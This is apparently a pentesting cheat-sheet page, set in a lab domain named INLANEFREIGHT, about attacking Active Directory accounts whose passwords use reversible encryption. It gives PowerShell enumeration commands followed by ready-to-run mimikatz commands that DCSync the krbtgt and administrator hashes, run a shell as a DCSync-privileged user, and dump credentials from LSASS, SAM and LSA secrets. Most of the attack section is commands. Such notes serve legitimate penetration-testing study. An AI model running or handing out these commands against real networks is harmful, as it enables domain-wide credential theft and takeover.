reverse-encryption-password-storage-attack

When this option set on a user account, it does not mean that the passwords are stored in plaintext, instead they are stored using RC4 encryption.

The trick is that the key needed to decrypt them is stored in the registry (Syskey) and can be extracted by a domain admin or equivalent. Tools such as secretdump.py decrypt any passwords stored using reversible encryption while dumping the NTDS file.

Any passwords set on accounts with this setting enabled will be stored using reversible encryption until they are changed, we can enumerate it.

Check for reversible encryption option

Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl

Check for reversible encryption option

Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol

Attack

.\mimikatz.exe "lsadump::dcsync /user:inlanefreight\krbtgt" exit

Reversible encryption password attack (`mimikatz`)

Run powershell as different user (user who has DCSync)

runas /netonly /user:INLANEFREIGHT\CT059 powershell

Attacking (powershell)

.\mimikatz.exe "privilege::debug lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator" exit

Get all hashes/clear-text passwords

.\mimikatz.exe "sekurlsa::minidump lsass.dmps" exit

.\mimikatz.exe "sekurlsa::logonpasswords lsadump::lsa /inject lsadump::sam lsadump::secrets" exit

Previousretrieve-password Nextset-domain-object

Last updated 21 hours ago

hashtagCheck for reversible encryption option

hashtagCheck for reversible encryption option

hashtagAttack

hashtagReversible encryption password attack (mimikatz)

Check for reversible encryption option

Check for reversible encryption option

Attack

Reversible encryption password attack (`mimikatz`)